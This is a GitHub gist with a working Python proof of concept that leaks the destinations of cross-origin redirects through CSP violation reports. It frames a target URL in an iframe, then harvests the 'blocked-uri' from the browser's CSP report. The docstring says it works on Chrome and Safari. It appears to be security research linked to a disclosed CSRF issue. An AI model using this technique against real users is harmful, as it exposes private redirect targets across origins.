Created
March 26, 2020 15:48
-
-
Save malaya-zemlya/a943b970797c96015134bd45fa948f33 to your computer and use it in GitHub Desktop.
Redirect leak via CSP Report
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
POC of a redirect leak via CSP reports | |
as described in https://obmiblog.blogspot.com/2019/12/gcp-5k-file-uploading-csrf.html | |
Usage: navigate to http://localhost:8080/?http://url.to.check/ | |
Works on Chrome v77 and Safari v13.0.5 | |
On Firefox does the right thing and returns the original frame URL | |
""" | |
import json | |
import urllib | |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer | |
PORT_NUMBER = 8080 | |
global_url_store = {} | |
def parse_path(path): | |
"""Extracts url path and query param from a http request.""" | |
parts = path.split('?', 1) | |
if len(parts) == 1: | |
return parts[0], '' | |
else: | |
q = parts[1] | |
if q.startswith('p='): | |
q = urllib.unquote(q[2:]) | |
return parts[0],q | |
def escape_entities(s): | |
""" quick and dirty escaping of html entitites """ | |
return s.replace('&', '&').replace('<', '<').replace('>', '>').replace('\'', ''').replace('\"', '"') | |
def js_escape(s): | |
""" quick and dirty escaping of js strings """ | |
result = [] | |
for c in s: | |
if c.isalnum(): | |
result.append(c) | |
else: | |
result.append('\\u{:04x}'.format(ord(c))) | |
return ''.join(result) | |
def generate_script(url): | |
""" generates javascript that calls back our server and fetches the url extracted from the CSP report """ | |
return r""" | |
setTimeout(function(){ | |
fetch('%s') | |
.then((response) => { | |
return response.json(); | |
}) | |
.then((data) => { | |
document.getElementById('out').innerText = 'Redirects to ' + data['uri'] | |
}); | |
}, 1000) | |
""" % url | |
class myHandler(BaseHTTPRequestHandler): | |
# page at / | |
def handleRoot(self, query): | |
src_url = query or "http://tiny.cc/szjylz" # demo url, redirects to vk.com | |
self.send_header("Content-type", "text/html") | |
self.send_header("Content-Security-Policy-Report-Only", | |
"frame-src " + urllib.quote(src_url) + "; report-uri /leak?" + urllib.quote(src_url)) | |
self.end_headers() | |
# Send the html message | |
self.wfile.write("<!doctype html><html><body>\n") | |
self.wfile.write("<h3>Iframe source: " + escape_entities(src_url) + "</h3>\n") | |
self.wfile.write("<iframe style='width:200px' src='" + escape_entities(src_url) + "'></iframe>\n") | |
self.wfile.write("<script>" + generate_script(url="/ajax?" + js_escape(urllib.quote(src_url)) ) + "</script>\n") | |
self.wfile.write("<div id=out></div>\n") | |
self.wfile.write("<form action='/' method=GET><input style='width:200px' name=p type=text size=50 placeholder='enter a url'></form>") | |
self.wfile.write("</body></html>") | |
# page at /ajax?p={site to be queried} | |
def handleAjax(self, query): | |
self.send_header("Content-type", "application/javascript") | |
self.end_headers() | |
uri = global_url_store.get(query, "") | |
print("GET: " + query + " => " + uri) | |
self.wfile.write(json.dumps({"uri": uri})) | |
def do_GET(self): | |
path, query = parse_path(self.path) | |
if path == "/": | |
self.send_response(200) | |
self.handleRoot(query) | |
elif path == "/ajax": | |
self.send_response(200) | |
self.handleAjax(query) | |
else: | |
self.send_response(404) | |
self.wfile.write("not found") | |
return | |
# page at /leak?p={site to be queried} | |
def handleLeak(self, query): | |
if "Content-Length" in self.headers: | |
data_string = self.rfile.read(int(self.headers["Content-Length"])) | |
data = json.loads(data_string) | |
else: | |
data = {} | |
target_uri = data.get("csp-report", {}).get("blocked-uri", "") | |
global_url_store[query] = target_uri | |
print("SET: " + query + " => " + target_uri) | |
self.send_response(204) | |
self.send_header("Content-type", "application/json") | |
self.end_headers() | |
def do_POST(self): | |
path, query = parse_path(self.path) | |
if path == "/leak": | |
self.handleLeak(query) | |
else: | |
self.send_response(404) | |
self.wfile.write("not found") | |
return | |
try: | |
# Standard python http server stuff | |
server = HTTPServer(("", PORT_NUMBER), myHandler) | |
print ("Started httpserver on port ", PORT_NUMBER) | |
# Wait forever for incoming htto requests | |
server.serve_forever() | |
except KeyboardInterrupt: | |
print() | |
"^C received, shutting down the web server" | |
server.socket.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment